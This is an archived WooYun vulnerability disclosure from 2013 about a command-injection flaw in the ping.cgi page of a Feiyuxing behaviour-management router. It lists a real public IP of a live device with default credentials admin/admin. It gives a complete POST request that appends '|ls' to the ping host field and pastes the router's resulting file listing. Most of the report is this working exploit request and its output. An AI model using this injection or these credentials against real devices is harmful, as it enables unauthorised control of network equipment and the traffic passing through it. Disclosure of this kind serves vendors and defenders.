乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-15: 细节已通知厂商并且等待厂商处理中 2013-10-19: 厂商已经确认,细节仅向厂商公开 2013-10-22: 细节向第三方安全合作伙伴开放 2013-12-13: 细节向核心白帽子及相关领域专家公开 2013-12-23: 细节向普通白帽子公开 2014-01-02: 细节向实习白帽子公开 2014-01-13: 细节向公众公开
飞鱼星上网行为管理路由器存在命令执行漏洞
http://222.74.37.246/ping.cgi用户密码 admin/admin
POST /ping.cgi HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/msword, */*Referer: http://222.74.37.246/ping.cgiAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 222.74.37.246Content-Length: 94Connection: Keep-AlivePragma: no-cacheENABLE_EXTERNAL_PING=YES&PING_HOSTIP=baidu.com|ls&PING_COUNT=3&LANGUAGE=&OKBTN=%E5%BC%80%E5%A7%8B
English 简体中文 繁體中文VE1260G[Beta 1023] Ping Tracert 1 2 3 4 5 6 7 8 9 10 agent.cgi analyze.cgi app_attemper.cgi app_attemper_edit.cgi appfunction.cgi appfunction_edit.cgi arp.cgi backup-restore.cgi certifiadd.cgi certifistart.cgi chinese.js chinese_complex.js chinese_complexhl.js chinesehl.js conn_limit.cgi conn_limit_edit.cgi css dhcplist.cgi diag.cgi dnscache.cgi dnscache_edit.cgi dyndns.cgi dyndns_edit.cgi english.js englishhl.js errors firewall.cgi firewall_edit.cgi flux_adv_edit.cgi flux_capacity_edit.cgi flux_detail_edit.cgi flux_limit.cgi flux_limit_edit.cgi flux_q3userapp_edit.cgi fw.cgi fw_edit.cgi game.cgi groupip.cgi groupip_edit.cgi groupipname.cgi groupipname_edit.cgi grouptime.cgi grouptime_edit.cgi help.tpl htmlgame.cgi httpsec.cgi identityreg.cgi ifac.cgi im.cgi images index.cgi interface_status.cgi ipauth.cgi ipmac.cgi ipmac_edit.cgi ipsec.cgi ipsec_edit.cgi ipsecnode.cgi joint_punish.cgi js l2tp_mode.cgi l2tp_vpn.cgi l2tp_vpn_edit.cgi l2tpipsec.cgi l2tpipsec_user_edit.cgi lanconf.cgi lanconf_edit.cgi lanconfitem.cgi license.cgi linka_applyprio.cgi linka_applyprio_edit.cgi linka_arpdefens.cgi linka_arpdefens_edit.cgi linka_arpdefens_limit.cgi linka_bufpolicy.cgi linka_cabletest.cgi linka_cascadeport.cgi linka_cfghandle.cgi linka_joint_punish.cgi linka_manage.cgi linka_netdev_protect.cgi linka_port.cgi linka_port_edit.cgi linka_portmap.cgi linka_portprio.cgi linka_portprio_edit.cgi linka_pstatistic.cgi linka_pve.cgi linka_pve_edit.cgi linka_pvlan.cgi linka_pvlan_edit.cgi linka_queschedule.cgi linka_queschedule_edit.cgi linka_rstp.cgi linka_rstp_edit.cgi linka_system.cgi linka_systemup.cgi linka_trunk.cgi linka_trunk_edit.cgi linka_trustmodel.cgi linka_trustmodel_edit.cgi linka_tvlan.cgi linka_tvlan_edit.cgi linka_virusfl.cgi linka_virusfl_edit.cgi linkage_devmanage.cgi linkage_register.cgi log.js mac_filt.cgi mac_filt_edit.cgi macauth.cgi macauth_edit.cgi man.cgi man_edit.cgi menu.tpl murl.cgi nat_1to1.cgi nat_1to1_edit.cgi nat_out.cgi nat_out_edit.cgi net_protect.cgi netconfig.cgi netsafe.cgi notic.cgi npnp.cgi npnp_edit.cgi nqos.cgi nqos_edit.cgi nqos_ltedit.cgi num.cgi p2p.cgi password.cgi ping.cgi policy.cgi policy_edit.cgi port_manage.cgi portfw.cgi portfw_edit.cgi pppoes.cgi pppoes_edit.cgi pppoes_mc.cgi pptp.cgi pptp_user_edit.cgi pptpc.cgi qq_edit.cgi qqmanage.cgi qqmanage_edit.cgi reboot.cgi remote_user.cgi remote_user_edit.cgi restore_conf.cgi route.cgi route_edit.cgi scan_packet.cgi share_net.cgi smtp.cgi sniff.cgi snmpclient.cgi speed.cgi stat.cgi stat2.cgi stat3.cgi stat4.cgi stat5.cgi stat6.cgi stat7.cgi static_dhcp.cgi static_dhcp_edit.cgi static_dhcppool_edit.cgi stock.cgi super_manage.cgi svpn.cgi svpn_tunnel.cgi svpn_tunnel_edit.cgi syslog.cgi system.cgi system_status.cgi total.cgi tr069client.cgi up.cgi upadpage.cgi upadpageapp.cgi upblockpage.cgi upblockpageapp.cgi update.cgi updateconf.cgi updresult.cgi upload.cgi upnp.cgi upnpe.cgi upnpe_edit.cgi upnpedit.cgi uppppoespage.cgi upstrategy.cgi upwebcertifiimage.cgi usb_3g.cgi usb_3g_speed.cgi usb_download.cgi usb_printer.cgi usb_status.cgi usb_storage.cgi usb_upnp.cgi vh_family.cgi vh_fmweb.cgi virus.cgi vlan.cgi wan.cgi wan_speed.cgi wan_speed_test.cgi wancontrol.cgi wanmode.cgi warn.cgi webcertifi.cgi webipauth.cgi webmacauth.cgi webmacauth_edit.cgi weboption.cgi webserver webuser.cgi wishfi.cgi wizard.cgi wl_advance.cgi wl_base.cgi wl_guest.cgi wl_mac.cgi wl_mac_edit.cgi wl_security.cgi wl_status.cgi wl_vssid.cgi wl_vssid_edit.cgi wl_wds.cgi wl_wds_apscan.cgi wl_wps.cgi wolgroup.cgi wolgroup_edit.cgi Copyright ©
危害等级:高
漏洞Rank:15
确认时间:2013-10-19 21:09
暂无